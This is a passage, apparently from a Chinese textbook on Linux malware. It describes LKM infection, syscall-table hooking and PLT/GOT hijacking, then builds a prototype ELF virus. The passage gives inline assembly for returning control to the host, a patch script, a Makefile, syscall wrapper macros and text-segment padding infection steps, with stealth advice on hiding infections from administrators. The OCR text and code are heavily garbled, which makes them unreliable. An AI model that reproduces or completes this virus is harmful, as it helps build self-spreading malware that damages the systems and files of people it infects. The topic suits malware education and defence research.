译 内 核 。 通 常 使 用 LKM 用 来 加 载 一 些 设备 驱动 ,可 以 捕获 系统 调用 ,功能 十 分 强大 。 

与 一 般 程序 不 同 的 是 LKM 没有 main() 函 数 ,提供 的 是 init_module() 和 cleanup_ 
module() 两 个 函数 。 第 一 个 是 初始 化 函数 ,用 来 初始 化 所 有 数据 ,第 二 个 是 关闭 函数 ,用 来 
清除 数据 ,从 而 安全 地 退出 。 对 LKM 的 感染 就 是 在 这 两 个 函数 中 做 手脚 。 

其 实 LKM 病毒 编写 并 不 复杂 ,基本 原理 就 是 通过 修改 . strtab 和 . symtab 中 的 字符 串 
来 实现 ,修改 这 两 个 节 中 存储 的 init 函数 的 地 址 ,将 其 修改 成 其 他 的 函数 就 是 在 模块 加 载 时 
执行 其 他 的 函数 。 修 改过 程 也 很 简单 ,查找 这 两 个 节 , 依 次 循环 读 取 每 个 节 中 的 表 项 , 读 取 
后 与 查找 的 字符 串 比较 ,如 果 相 等 , 则 返回 该 字符 串 偏 移 并 修改 成 别 的 函数 名 。 因 此 感染 
LKM 前 先 要 了 解 目 标 文件 中 的 相关 符号 。 其 中 LKM 的 目标 文件 中 的 . symtab 和 . strtab 
节 是 很 重要 的 获取 符号 名 称 的 途径 。 对 于 符号 表 中 表 项 里 的 st_name 是 需要 关注 的 ,这 是 
.strtab 节 的 一 个 索引 ,符号 的 名 称 都 存储 在 . strtab 节 中 。 通 过 从 . symtab 节 中 查 到 . strtab 
中 某 个 字符 串 的 偏 移 , 然 后 修改 这 个 字符 串 ,由 于 . strtab 节 存 储 的 是 一 系列 非 空 字 符 串 , 因 
此 有 一 个 限制 就 是 修改 后 的 字符 串 长 度 不 能 超过 原来 的 字符 串 ,这 跟 溢出 类 似 ,超过 后 就 会 
覆盖 后 面 的 字符 串 。 

现在 考虑 的 问题 就 是 如 何 向 已 有 的 模块 中 插入 新 的 代码 ,实现 的 方法 是 使 用 链接 器 
1d ,链接 的 两 个 模块 共享 彼此 的 符号 。 另 外 一 个 限制 是 几 个 模块 中 不 能 有 同名 符号 。 链 接 
后 的 模块 经 过 修改 符号 表 或 字符 串 表 便 可 以 执行 插入 代码 ,而 不 是 原来 的 代码 。 

为 了 保持 感染 模块 的 隐蔽 性 ,必须 使 修改 过 的 init_module 函数 仍然 能 够 执行 先前 的 功 
能 , 即 在 感染 代码 中 调用 原来 的 init_module 函数 。 

在 编 好 程序 进行 感染 调试 的 过 程 中 ,可 以 通过 readelf 和 objdump 工具 不 断 进行 对 
ELF 格式 文件 内 容 查 看 ,确定 是 否 成 功 感染 。 

可 以 利用 感染 LKM 做 很 多 重要 的 事情 .这 是 其 他 感染 普通 的 可 执行 ELF 文件 不 可 能 实 
现 的 功能 。 其 中 LKM 的 一 个 用 途 是 截获 系统 调用 ,使 正常 的 系统 调用 来 执行 自 定 义 的 任务 。 
只 需要 改变 sys_call_table 中 相应 的 入 口 就 可 以 达到 截获 系统 调用 的 目的 。 步 又 如 下 。 

(1) 找到 需要 修改 的 系统 调用 在 sys_call_table[ ] 中 的 入 口 ,可 以 查看 文件 /usr/ 
include/sys /syscall.h。 

(2) 保存 sys_call_table[ x] 的 原 指 针 , 用 来 完成 原 系统 调用 的 功能 ,防止 程序 运行 出 错 。 
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(3) 将 自 定义 的 新 函数 指针 放 入 sys_call_table[ x] 中 ,将 保存 的 原 指针 放 入 新 的 系统 调 
用 函数 中 来 实现 原 有 调用 。 
2. PLT/GOT 劫持 实现 


对 于 两 个 ELF 文件 之 间 的 链接 ,链接 编辑 器 (Link Editor) 解 决 不 了 两 个 文件 之 间 执 行 
转移 的 问题 ,因此 将 包含 程序 转移 控制 的 入 口 放 入 程序 链接 表 中 (Program Linker Table， 
PLT) 。 动 态 链接 器 会 根据 这 些 表 项 决定 目标 的 绝对 地 址 并 修改 GOT 表 中 的 相关 表 项 。 
ELF 文件 中 的 全 局 偏 移 表 (Global Offset Table, GOT) 能 够 把 与 位 置 无 关 的 地 址 定位 到 绝 
对 地 址 。 

感染 ELF 文件 的 PLT 表 是 利用 了 PLT 在 搜索 库 调 用 时 的 重要 性 ,可 以 修改 相关 代码 
来 跳 转 到 自己 定义 的 感染 代码 中 ,取代 原来 的 库 调用 ,实现 病毒 传染 。 通 过 感染 可 执行 文件 
并 修改 PLT 表 导 致 共享 库 重 定向 来 实现 病毒 ,并 且 在 取代 之 前 保存 原来 的 GOT 状态 ,可 
以 在 执行 完 病 毒 代 码 后 重新 调用 恢复 原来 的 库 调 用 。 修 改 PLT 表 中 的 代码 需要 将 文本 段 
修改 为 可 写 的 权限 ,否则 会 造成 感染 失败 。 

对 PLT 实现 重 定向 的 算法 具体 可 以 进行 如 下 描述 。 

(1) 将 文本 段 修改 为 可 写 权 限 。 

(2) 保存 PLT 入 口 点 。 

(3) 使 用 新 的 库 调用 地 址 替代 原 入 口 。 

(4) 对 新 的 库 调用 中 代码 的 修改 实现 新 的 库 调用 的 功能 ,保存 原来 的 PLT 入 口 ,调用 
原来 的 库 调用 。 


4.6 Linux ELF 病毒 实例 


本 节 将 在 前 面 理论 的 基础 上 编写 一 个 病毒 原型 ,本 病毒 原型 主要 由 C 语言 编写 , 少 部 
分 无 法 由 C 语言 来 完成 的 底层 操作 采取 GCC 内 徐汇 编 的 方式 实现 。 


4.6.1 病毒 技术 汇总 


本 次 病毒 实例 的 实现 程序 结合 了 两 种 常见 的 传染 技术 , 即 4. 5 节 感染 技术 中 介绍 的 文本 
段 之 后 填充 区 感染 和 数据 段 之 后 感染 的 方法 ,在 本 次 病毒 示例 中 用 到 的 相关 技术 说 明 如 下 。 
.修订 病毒 代码 的 方法 

由 于 病毒 代码 先 于 宿主 程序 执行 ,并 且 为 了 防止 被 发 现 ,要 在 病毒 执行 结束 后 跳 转 到 宿主 
程序 入 口 处 执行 , 即 交 还 控制 权 的 过 程 ,因此 需要 根据 不 同 的 感染 宿主 对 病毒 代码 进行 修订 。 
有 很 多 种 方法 交还 控制 权 , 这 里 仅 介绍 两 种 ,它们 都 是 通过 GCC 内 戏 汇 编 的 形式 来 实现 的 。 

第 一 种 方法 是 利用 movl 和 jmp 两 条 指令 的 组 合 来 实现 , 跳 转 到 原宿 主 代码 入口 点 ,本 
病毒 程序 使 用 的 是 这 种 技术 。 代 码 如 下 。 


EN 


__asm_ _ volatile ( 
"mov] OxAAAABBBB % % eax\n\t" 
"jmp % %eax\n" 


RE 
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上 面 的 0xAAAABBBB 代表 原宿 主 文件 的 入 口 点 地 址 ,在 感染 过 程 中 会 被 修改 ,修改 
的 程序 如 下 。 


x (int * )&Virus[JMP OFFSET] = OldEntry; 


JMP_OFFSET 是 0xAAAABBBB 位 置 在 病毒 体 中 的 偏 移 。 

另外 一 种 方法 就 是 利用 push 和 ret 的 组 合 , 即 跳 转 到 宿主 文件 入 口 点 。 

上 面 的 0xAAAABBBB 是 代表 原宿 主 文件 的 入 口 点 地 址 ,在 感染 过 程 中 会 被 修改 。 修 
改 的 指令 如 下 。 


__asm_ volatile ( 
"push xAABBCCDD\n\t" /x push ret address */ 
"ret\n" 


2 


2. 两 次 编译 修改 宏 

源 程序 写 好 后 ,并 不 知道 编译 后 病毒 体 的 大 小 ,必须 在 编译 后 利用 objdump 反 汇编 程序 查 
看 得 知 病毒 体 的 大 小 以 及 movl 0xAAAABBBB %eax 指令 到 病毒 体 起 始 位 置 的 偏 移 量 JMP_ 
OFFSET, 以 及 通过 查找 virus() 和 virus_end() 函数 来 定位 病毒 体 大 小 VIRUS_SIZE, 根 据 这 两 
个 获得 的 值 修 改 两 个 头 文件 virus. h 和 infector. h, 将 修正 virus. h 中 的 JMP_OFFSET 和 
VIRUS_SIZE 以 及 infector. h 中 的 _JMP_OFFSET 和 _VIRUS_SIZE 宏 定 义 。 

这 些 都 是 通过 脚本 完成 的 ,脚本 的 名 称 是 get_patch. sh, 脚 本 内 容 如 下 。 


#!/bin/bash 

objdump - d infect |grep "< virus >" >patch 

objdump - d infect |grep aaaabbbb >> patch 

objdump - d infect |grep "< virus_end>" >> patch 

base = 'cat patch|grep "< virus>:" |cut -c2-8' 
jmp_addr = 'cat patch|grep aaaabbbb |cut —c2—8’ 
virus_end = 'cat patch|grep "<virus end>" |cut ~-c2—8' 
JMP_OFFSET= 'echo $(($((16# $ jmp_addr))- $ ((16# $base)))) 
((JMP_OFFSET++ ) ) 

VIRUS_SIZE = 'echo $(($((16# $virus_end)) - $ ((16# $base)))) 
sed '/\#define _/d' infector.h > tmpl 

echo "#define _JMP_OFFSET $ JMP_OFFSET" >> tmpl 

echo "#define _VIRUS_SIZE $ VIRUS_SIZE" >> tmpl 

rm 一 上 infector.h 

mv tmpl infector.h 

sed '/\#define JMP_OFFSET/d' virus. h > tmp2 

sed '/\#define VIRUS_SIZE/d' tmp2 > tmpl 

echo "#define JMP_OFFSET $ JMP_OFFSET" >> tmpl 

echo "#define VIRUS SIZE $ VIRUS_SIZE" >> tmpl 

rm -fvirus.h 

mv tmpl virus.h 

rm —f tmp2 

echo "VIRUS SIZE= $VIRUS SIZE" 

echo "JMP OFFSET= $ JMP OFFSET 
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在 脚本 中 得 到 的 JMP_OFFSET 差 值 需要 加 一 ,因为 要 定位 到 AAAABBBB 位 置 需要 
跳 过 一 个 字 节 的 指令 符号 。 修 正好 的 两 个 头 文件 再 次 进行 编译 。Make all 命令 执行 后 得 到 
的 就 是 含有 病毒 体 的 infect 可 执行 文件 。 


3. 编译 选项 设置 
编译 选项 选择 的 依据 是 尽量 使 病毒 代码 体积 小 使 执行 效率 提高 ,基于 这 两 点 来 选择 编 
译 选 项 。 


编译 选项 见 Makefile 文件 ,代码 如 下 。 


Cc=gcc 
CEFLRAGS = 一 c — fomit— frame— pointer — Wall 
CLEANFILES = virus.o infect 


all: infect 
infect: infector.c virus.o 

$ (CC) $<virus.o -o infect -Wall 
Virus.o:virus.c 

$ (CC) $< $ (CFLAGS) -ovirus.o 
clean: 

rm 一 上 $ (CLEANFILES) 


4. 两 种 感染 方法 的 选择 和 共存 

在 病毒 实现 中 使 用 两 种 感染 方法 ,目的 是 扩大 能 够 被 感染 的 程序 范围 。 由 于 这 两 种 感 
染 方法 各 有 所 长 ,因此 必须 结合 实际 的 可 执行 文件 来 判断 使 用 哪 种 感染 方法 进行 感染 才能 
够 优势 互补 并 且 消 除 每 种 感染 方法 的 缺陷 。 

目前 实现 的 病毒 对 两 种 方法 的 选择 规则 是 ,优先 使 用 文本 段 填充 区 感染 的 方法 ,如 果 填 
充 区 比 病毒 的 体积 小 , 则 自动 切换 到 使 用 数据 段 之 后 感染 的 方法 。 可 以 在 以 后 的 设计 中 增 
加 一 个 随机 函数 来 随机 确定 使 用 哪 一 种 方法 进行 感染 ,这 样 更 能 提高 病毒 的 隐蔽 性 和 查 杀 
病毒 的 难度 。 

另外 感染 器 的 实现 也 有 两 种 感染 方法 ,因此 感染 器 需要 3 个 参数 ,第 三 个 参数 是 text 
或 data, 以 它 来 确定 使 用 哪 一 个 段 进行 感染 。 部 分 病毒 对 文本 段 感染 方法 不 适合 ,只 能 使 用 

在 感染 器 中 提供 一 个 参数 int method, 根 据 这 个 参数 的 值 来 判断 经 过 哪 一 个 感染 流程 。 

同样 ,在 病毒 体 源 代码 中 ,也 有 一 个 method 参数 , 放 在 判断 是 否 可 以 进行 文本 段 填充 
感染 的 位 置 。 该 参数 取 值 策略 决定 了 病毒 体 传播 时 选择 传染 方法 的 策略 。 

程序 判断 完 使 用 的 感染 方法 ,再 根据 method 的 值 来 指定 经 过 哪 一 个 感染 流程 ,对 于 大 
部 分 的 流程 ,这 两 种 感染 方法 还 是 相同 的 。 

5. 随机 感染 当前 和 上 层 目 录 

当前 病毒 尚未 开发 这 个 功能 ,为 了 防止 被 发 现 ,可 以 通过 增加 一 个 随机 函数 来 实现 随机 
感染 ,当前 病毒 只 是 一 个 演示 版 本 ,执行 只 感染 一 个 ELF 文件 ,并且 只 感染 当前 目录 的 第 一 
个 读 出 未 被 感染 的 文件 。 使 用 随机 感染 的 优点 是 更 加 隐蔽 ,使 系统 管理 员 难 以 发 现 感染 规 
律 , 从 而 增长 病毒 生存 期 。 这 是 该 病毒 未 来 实现 的 功能 。 
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当前 病毒 使 用 读 取 方法 ,只 是 为 了 演示 ,所 以 只 读 取 当前 目录 未 被 感染 的 一 个 文件 ,并 
不 具有 强大 的 传染 性 。 

病毒 具体 是 通过 一 个 循环 体 实 现 的 。 它 不 断 读 取 当 前 的 文件 夹 中 的 文件 ,并 用 
checkelf 函数 检查 ,直到 有 一 个 满足 该 函数 要 求 , 即 该 函数 返回 值 为 0 时 ,循环 体 退出 。 开 
始 对 该 文件 实现 感染 。 

使 用 checkelf 函数 检查 合格 文件 的 dir->d_name 表示 的 文件 名 进行 传染 。 

对 于 文件 是 否 被 感染 的 判断 可 以 放 在 checkelf 函数 中 进行 ,判断 的 基准 可 以 利用 
e_ident[ ] 中 的 保留 位 ,由 于 保留 位 默认 为 0, 因 此 若 为 0 则 为 未 被 感染 的 可 执行 文件 , 若 不 
为 0, 可 以 设 定 一 定 的 值 来 标识 被 哪 种 方法 感染 ,也 可 以 不 设 定 ,只 将 其 中 一 位 设 为 非 0, 例 
如 ,本 病毒 中 将 e_ident[15] 设 为 非 0 来 表示 已 经 被 感染 了 ,过 到 这 一 类 的 文件 ,病毒 体会 自 
动 跳 过 , 读 取 当前 文件 夹 的 下 一 个 文件 。 

6. 寄存 器 的 保存 与 恢复 


寄存 器 保存 和 恢复 需要 在 病毒 体 执行 前 后 分 别 执行 人 栈 和 出 栈 指令 , 即 利用 到 push 和 
pop 指令 。 


push 指令 是 压 栈 ESP = ESP- 4 
pop 指令 是 出 栈 ESP = ESP+ 4 


由 于 是 跳 转 到 病毒 体 所 在 位 置 执行 病毒 代码 ,因此 为 了 能 够 在 病毒 体 执行 结束 后 安全 
地 交换 控制 权 给 原宿 主 文件 代码 ,必须 在 病毒 体 执行 前 保存 通用 寄存 器 ,并 且 在 病毒 体 执行 
之 后 恢复 这 些 寄存 器 的 值 。 尝 试 使 用 pushal 以 及 popal 指令 来 完成 这 项 工作 ,最 终 的 结果 
是 病毒 体感 染 其 他 文件 时 会 出 现 段 错误 (Segmentation Fault) ,因为 保存 了 多 余 的 %esp 寄 
存 器 ,这 个 寄存 器 保留 的 是 堆栈 的 指针 ,因此 不 需要 保存 和 恢复 ,去 除 这 个 寄存 器 后 ,对 其 他 
的 寄存 器 进行 保存 和 恢复 便 可 以 正常 执行 了 。 使 用 到 的 保存 寄存 器 的 代码 如 下 。 


_asm _ Volatile ( 
"push % % eax\n\t" 
"push % % ecx\n\t" 
"push % % edx\n\t" 
"push % % ebx\n\t" 
"push % % ebp\n\t" 
"push % %esi\n\t" 
"push % %edi\n\t"::); 


使 用 到 的 恢复 寄存 器 的 代码 如 下 。 


_asm _ volatile ( 
"popl % %edi\n\t" 
"popl % %esi\n\t" 
"popl % % ebp\n\t" 
"popl % %ebx\n\t" 
"popl $% %edx\n\t" 
"popl % %ecx\n\t" 
"popl $% %eax\n\t" 
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注意 到 两 次 插入 的 内 徐汇 编 代 码 顺 序 是 相反 的 。 

7. 字符 串 使 用 

该 病毒 实现 并 没有 使 用 太 多 字符 串 ,只 使 用 了 一 个 “.”, 使 用 的 方法 就 是 将 这 个 字符 串 
放 入 一 个 数组 就 可 以 了 ,因为 这 个 字符 串 很 简单 ,没有 必要 使 用 破坏 程序 流程 的 方法 。 

病毒 代码 中 使 用 字符 串 比 较 麻烦 ,需要 动态 获得 字符 串 地 址 ,因为 病毒 体 转移 到 新 的 宿 
主 中 时 ,对 于 字符 串 的 绝对 地 址 的 引用 就 会 改变 。 本 病毒 代码 使 用 的 字符 串 的 方法 参考 
Silvio Cesare 的 UNIX ELF Parasites and Virus 中 提供 的 方法 。 利 用 了 缓冲 区 溢出 中 
shellcode 的 编写 技术 。 


jmpA 

B: 

pop % eax ; eax 现在 含有 字符 串 的 地 址 
A: 

callB 

,string "hello" 


A 中 就 是 字符 串 "hello" 的 地 址 。 从 而 可 以 使 用 这 个 地 址 来 调用 字符 串 。 

8. 不 使 用 C 库 函 数 

对 于 调用 的 C 库 函 数 都 将 在 头 文件 中 重新 编写 ,因为 调用 外 部 的 C 库 会 造成 病毒 体 在 
不 同 的 宿主 内 无 法 执行 的 结果 。 为 了 将 所 有 的 函数 调用 都 发 生 在 病毒 体内 ,将 自己 重新 编 
写 的 系统 调用 放 入 病毒 体 。 这 些 函 数 的 实现 放 入 头 文件 virus. bh 中 。 

重新 利用 系统 调用 ,内 徐汇 编 以 及 int 0x80 中 断 来 编写 需要 的 函数 ,在 virus.h 中 的 内 
容 如 下 。 


static inline __syscall2(int, fstat, int, filedes, struct stat * ,buf); 

static inline _syscalll(void, exit, int, status); 

static inline __syscall3(int, open, const char * ,file, int, flag, int, mode); 
static inline __syscalll(int, close, int, fd); 

static inline __syscall3(off t, lseek, int ,filedes, off t, offset, int,whence); 
static inline __syscall3(ssize t, read, int ,fd, void *, buf, size t,count); 
static inline __syscall3(ssize t, write, int ,fd, const void *, buf, size t,count); 


static inline __syscall3(int, getdents, uint, fd, struct dirent *, drip, uint, count); 


上 面 的 _syscalll 、_syscall2、_syscall3 的 定义 如 下 ,这 是 通过 内 嵌 含 有 系统 调用 的 汇 
编 语言 代码 来 实现 的 ,具体 实现 如 下 。 


#define syscal11(typename,typel,argl) \ 
type name (typel arg1) \ 
BY 
long __res; \ 
asm _ volatile ( "int $ 0x80 " \ 
:ua (es) \ 
: "0" (__NR ##name), "b" ((long)(argl))); \ 
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return (type) _res; \ 
} 
#define __syscall2(type, name, typel, argl, type2,arg2) \ 
type name (typel argl, type2 arg2)\ 
人 
long __res; \ 
__asm volatile ("int $ 0x80" \ 
: "ma ( res) \ 
: "0" (__NR_###name), "b" ((long)(arg1)),"c" ((long) (arg2))); \ 
return (type) __res; \ 


} 


#define __syscall3(type, name, typel, argl, type2, arg2, type3, arg3) \ 
type name(typel argl,type2 arg2, type3 arg3) \ 


GN 
long __res; \ 
__asm _ volatile ("int $ 0x80" \ 
:"=a" (_res) \ 
:"0" (__NR_##name),"b" ((long)(arg1)), "c" ((long) (arg2)), "d"((long) 
(arg3))); \ 


return (type) __res; \ 
} 


对 于 使 用 到 的 memcpy 函数 ,也 同样 需要 用 内 榜 汇编 的 方法 来 实现 ,直接 将 函数 的 内 幅 
汇编 定义 复制 一 份 放 到 virus. h 头 文件 中 。 本 程序 中 复制 的 是 memcpy 程序 。 

对 某 些 宏 定 义 , 在 virus. h 中 也 需要 自己 声明 ,在 本 病毒 体内 自己 声明 的 C 库 中 的 宏 有 
SEEK_SET(0) SEEK_CUR(1) 和 SEEK_END(2) 。 

9. 关于 代码 体积 

对 于 第 一 种 ELF 文件 文本 段 填充 区 感染 方法 .应 该 尽量 减少 代码 的 体积 ,这 样 才能 使 
被 感染 的 ELF 可 执行 文件 更 多 ,病毒 广泛 传播 的 空间 更 大 。 

压缩 代码 体积 可 以 通过 编译 选项 进行 优化 ,减少 系统 调用 次 数 等 方法 ,在 本 病毒 程序 中 
的 应 用 有 对 节 和 有 段 使 用 指针 大 块 读 取 ,实现 方法 代码 就 是 将 整个 程序 头 表 统 一 读 入 一 个 数 
组 中 ,然后 对 这 一 块 内 存 区 域 进行 操作 ,主要 利用 指针 对 内 存 进行 操作 实现 的 。 

循环 执行 对 程序 头 表 的 查找 和 修改 ,代码 是 根据 指针 指向 地 址 逐渐 增加 的 原理 来 实现 
的 。 最 后 修改 完 执行 一 次 将 所 有 程序 头 统一 写 入 的 代码 。 

对 于 节 表 的 查找 与 修改 利用 相似 的 方法 。 目 的 是 减 小 生成 的 病毒 体 的 体积 。 

10. 使 用 到 C 库 中 的 数据 结构 

由 于 程序 中 使 用 到 了 glibc 中 的 一 些 数 据 结构 ,并 且 不 能 包含 C 库 函 数 ,因此 必须 自己 
将 这 些 数 据 结 构 的 定义 复制 到 头 文件 中 。 使 用 到 的 数据 结构 主要 有 dirent 和 stat 两 个 。 
数据 结构 具体 定义 如 下 。 
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struct dirent 
{ 
long d_ino; 
off td off; 
unsigned short d_reclen; 
char d_name[ 256]; 
}; 


struct stat { 
unsigned long st_dev; 
unsigned long st_ino; 
unsigned short st_mode; 
unsigned short st_nlink; 
unsigned short st _uid; 
unsigned short st gid; 
unsigned long st_rdev; 
unsigned long st_size; 
unsigned long st_ blksize; 
unsigned long st _blocks; 
unsigned long st_atime; 
unsigned long st_atime nsec; 
unsigned long st_mtime; 
unsigned long st _ mtime nsec; 
unsigned long st_ctime; 
unsigned long st_ctime nsec; 
unsigned long _unused4; 
unsigned long __unused5; 

}; 


11. 病毒 代码 执行 时 获得 起 始 地 址 

第 一 次 感染 利用 已 经 指定 的 病毒 体 函 数 地 址 来 实现 取 病 毒 和 感染 过 程 ,但 是 当 病 毒 体 
自身 执行 的 时 候 是 没有 把 自身 当 作 函 数 执 行 的 ,因此 必须 添加 内 嵌 汇 编 代 码 来 重新 定位 病 
毒 代码 起 始 地 址 或 者 文件 偏 移 。 

有 两 种 方法 可 以 实现 ,首先 是 加 入 内 嵌 汇 编 代码 ,在 病毒 体 执行 过 程 中 读 栈 ,将 放置 在 
栈 内 某 位 置 处 的 argv[0] 地 址 读 出 ,从 而 获得 当前 病毒 体 代码 所 属 ELF 格式 文件 的 路 径 , 病 
毒 体 所 在 文件 偏 移 位 置 可 以 根据 文件 ELF 头 中 的 入 口 点 地 址 或 者 文本 段 程序 头 中 的 filesz 
字段 来 获得 ,然后 由 文件 偏 移 量 读 到 病毒 体 代码 起 始 处 .再 将 病毒 体 代码 从 文件 中 读 取 复制 
一 个 副本 到 新 的 宿主 内 ,由 此 进行 传染 。 

读 取 argvL0] 可 以 参考 栈 顶 的 结构 。 内 核 在 运行 应 用 程序 之 前 要 在 堆栈 最 顶部 建立 一 
个 参数 块 ,默认 配置 下 参数 块 最 大 为 32 个 页 面 。 堆 栈 最 顶部 (0xBFFFFFFC) 的 字 保 留 为 
0, 接 下 来 依次 为 执行 文件 名 字符 串 ,环境 字符 串 表 , 命 令 行 参数 字符 串 表 及 处 理 器 名 称 字 符 
串 ,然后 是 一 段 辅助 信息 表 、 环 境 字符 串 指针 表 和 命令 行 字符 串 指 针 表 ,最 后 是 命令 行 参数 
数量 argco。 
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另外 一 种 方法 就 是 本 病毒 使 用 的 方法 ,利用 了 缓冲 区 溢出 编程 中 的 一 个 技巧 来 获取 。 
就 是 用 jmp/call 组 合 得 到 movl 0xAAAABBBB %% eax 指令 的 地 址 。 这 个 地 址 是 
0xAAAABBBB 地 址 向 后 一 个 movl 指令 ,而 0xAAAABBBB 的 地 址 就 是 那个 用 于 存放 病毒 
代码 返回 地 址 的 地 址 ,这 个 地 址 相对 于 病毒 代码 起 始 地 址 的 偏 移 是 已 知 的 , 即 病毒 代码 函数 
向 ELF Infector 接口 提供 的 那个 宏 定义 的 值 。 

具体 代码 如 下 。 


_asm volatile( 
"jmp A\n" 

"B:\n" 
:"=m"(jmp_addr) 
2); 


asm volatile( 


"jmp C\n" 

"A:\n\t" 

"call B\n" 

oNnNe” 

"mov] $ OxAAAABBBB, % % eax\n\t" 
"jmp * % Seax\n" 

:2 ); 


头 文件 的 宏 定 义 相 关内 容 : 


//define JMP_OFFSET 2336 
//define VIRUS_SIZE 2895 


病毒 代码 在 当前 宿主 内 存 映 像 中 的 位 置 就 可 以 得 到 了 。 根 据 获取 的 movl 
0xAAAABBBB %eax 指令 地 址 反 推出 病毒 代码 起 始 地 址 。 由 于 已 经 知道 这 条 指令 在 病毒 
代码 中 的 偏 移 , 即 JMP_OFFSET。 


start_addr = (jmp_addr + 1 — JMP_OFFSET); 


第 一 种 方法 最 大 的 缺陷 是 需要 插入 大 量 的 内 徐汇 编 代 码 , 即 在 编译 时 保存 frame 
pointer, 然 后 用 %ebp 寄存 器 进行 栈 内 位 置 偏 移 查找 ,并 定位 argv[0] 内 存 地 址 所 存 的 位 置 。 
可 以 发 现 很 难 从 栈 内 轻易 读 出 argv[0] 来 ,耗费 大 量 空间 却 仍然 存在 读 取 不 成 功 的 可 能 性 ， 
所 以 本 程序 优先 选择 第 二 种 方法 实现 。 

12. inline 函数 

使 用 inline 函数 将 小 的 函数 插入 病毒 代码 中 ,使 病毒 体能 够 以 一 个 类 似 函 数 的 完整 程 
序 存在 。 但 由 于 inline 关键 字 仅 仅 是 建议 ,而 不 是 强制 ,对 于 某 些 特别 大 的 函数 ,编译 器 默 
认 不 会 将 这 些 函数 插入 调用 位 置 ,因此 利用 inline 时 只 完成 一 些 较 小 的 工具 性 函数 ,而 主要 
感染 代码 放 入 到 病毒 函数 主体 内 。 


4.6.2 原型 病毒 实现 
已 经 说 明了 本 次 病毒 示例 中 用 到 的 相关 技术 。 现 在 开始 介绍 实现 的 细节 ,提供 原 
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型 病毒 的 伪 代 码 以 及 流程 图 ,并 介绍 编译 感染 过 程 。 以 实践 的 方式 使 读者 了 解 Linux ELF 
病毒 的 原理 与 概念 。 

1. 设计 思想 

通过 先前 一 系列 的 研究 分 析 , 得 到 一 个 制造 实现 Linux 下 感染 ELF 病毒 的 方案 , 逐 
步 分 析 实 现 一 个 具有 感染 ELF 文件 能 力 的 Linux 病毒 原型 ,并 对 该 病毒 进行 演示 测试 
研究 。 

本 病毒 原型 主要 由 C 语言 编写 , 少 部 分 无 法 由 C 语言 来 完成 的 底层 操作 采取 GCC 内 
嵌 汇 编 的 方式 实现 。 

在 本 次 病毒 实例 的 实现 程序 中 ,结合 了 两 种 常见 的 传染 技术 : 文本 段 之 后 填充 区 感 
染 和 数据 段 之 后 感染 。 选 择 这 两 种 感染 方法 是 由 于 它们 各 有 所 长 ,因此 必须 结合 实际 的 
可 执行 文件 来 判断 使 用 哪 种 感染 方法 进行 感染 才能 够 优势 互补 并 且 消 除 每 种 感染 方法 
的 缺陷 。 

目前 实现 的 病毒 对 两 种 方法 的 选择 规则 是 ,首先 优先 使 用 文本 段 之 后 填充 区 感染 的 方 
法 ,如 果 填 充 区 比 病毒 的 体积 小 , 则 自动 切换 到 使 用 数据 段 之 后 填充 病毒 的 方法 。 

关于 病毒 的 架构 ,该 病毒 包含 两 部 分 ,病毒 体 代 码 部 分 以 及 传染 器 部 分 ,要 在 编译 完 后 
使 用 感染 器 将 病毒 注入 第 一 个 宿主 文件 ,然后 执行 这 个 被 感染 的 宿主 文件 时 便 会 进行 文件 
感染 。 这 个 病毒 包含 的 文件 有 如 下 几 个 。 

(1) get_patch. sh: 用 来 修订 文件 中 两 个 安定 义 的 bash 脚本 文件 。 

(2) infector. c: 感染 器 程序 。 

(3) infector. h: 感染 器 程序 的 头 文件 。 

(4) Makefile: Makefile 文件 。 

(5) virus. c: 病毒 体 的 源 文件 。 

(6) virus. h: 病毒 体 头 文件 。 

设计 的 大 致 思想 就 是 先 把 病毒 体 编译 成 目标 文件 , 青 编译 感染 器 使 其 与 病毒 体 链接 并 
包含 病毒 体 ,然后 用 get_patch. sh 脚本 获取 跳 转 位 置 和 病毒 体积 来 修订 每 个 头 文件 中 的 两 
个 宏 。 青 次 编译 后 便 是 具有 感染 能 力 的 含有 病毒 体 的 感染 器 了 ,第 一 次 感染 是 利用 感染 器 
来 将 病毒 体 以 使 用 者 选择 的 方式 注入 到 指定 的 ELF 文件 中 去 的 。 然 后 执行 文件 ,病毒 体 先 
于 原宿 主 代码 执行 ,执行 过 程 中 会 读 取 当 前 目录 中 的 一 个 合适 的 可 执行 文件 ,然后 判断 这 个 
文件 的 文本 段 和 数据 段 之 间 是 否 有 足够 的 填充 空间 来 容纳 病毒 体 ,如 果 有 就 用 文本 段 填充 
的 方法 进行 感染 ,如 果 没 有 就 利用 数据 段 后 面 填充 病毒 的 原理 进行 感染 。 
总 体 来 说 ,病毒 的 设计 思路 是 很 简单 的 ,两 种 感染 方法 的 算法 在 4. 5 节 的 内 容 中 有 详细 
的 讲述 。 这 里 只 把 最 终 算 法 列举 一 下 ,病毒 体 和 感染 器 都 可 以 使 用 这 两 种 算法 进行 病毒 

2. 实现 过 程 

可 将 本 病毒 演示 分 为 几 个 大 的 模块 ,首先 是 第 一 个 宿主 感染 , 即 利用 感染 器 的 模块 ,第 
二 个 模块 是 病毒 体 模 块 。 感 染 器 模块 和 病毒 体 模 块 分 别 实现 ,并 且 利用 感染 器 的 头 文件 中 
的 两 个 函数 声明 链接 在 一 起 。 

在 算法 实现 过 程 上 ,可 以 分 为 感染 算法 、 目 标 选 择 算法 和 感染 方法 选择 算法 。 
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感染 算法 有 两 种 ,分 别 是 文本 段 之 后 填充 感染 算法 和 数据 段 之 后 填充 感染 算法 ,两 种 算 
法 的 具体 介绍 可 以 参考 4. 5 节 的 相关 内 容 , 这 里 只 列举 两 种 算法 的 最 终 描述 。 

第 一 种 算法 是 文本 段 后 填充 感染 ,具体 步骤 如 下 。 

(1) 增加 ELF header 中 的 e_shoff, 增 大 PAGESIZE 大 小 。 

(2) 修正 插入 代码 使 其 能 够 跳 转 到 原 主体 代码 的 入 口 点 。 

(3) 定位 文本 段 程序 头 : 修改 ELF 头 的 入 口 点 地 址 指向 新 的 入 口 点 (p_vaddr 十 
p_filesz); 增加 p_filesz 包含 新 代码 ; 增加 p_memsz 包含 新 代码 。 

(4) 对 于 文本 段 最 后 一 节 的 shdr: 增 大 sh_size 加 上 寄生 代码 的 大 小 。 

(5) 对 于 文本 段 之 后 的 phdr: 增加 p_offset 加 上 PAGESIZE 大 小 。 

(6) 对 于 那些 因 插入 寄生 代码 而 影响 偏 移 的 每 个 节 的 shdr: 增加 sh_offset 加 上 
PAGESIZE 大 小 。 

(7) 在 文件 中 物理 地 插入 寄生 代码 ,并 且 填 充 到 一 个 页 大 小 。 位 置 处 于 文本 段 的 p_ 
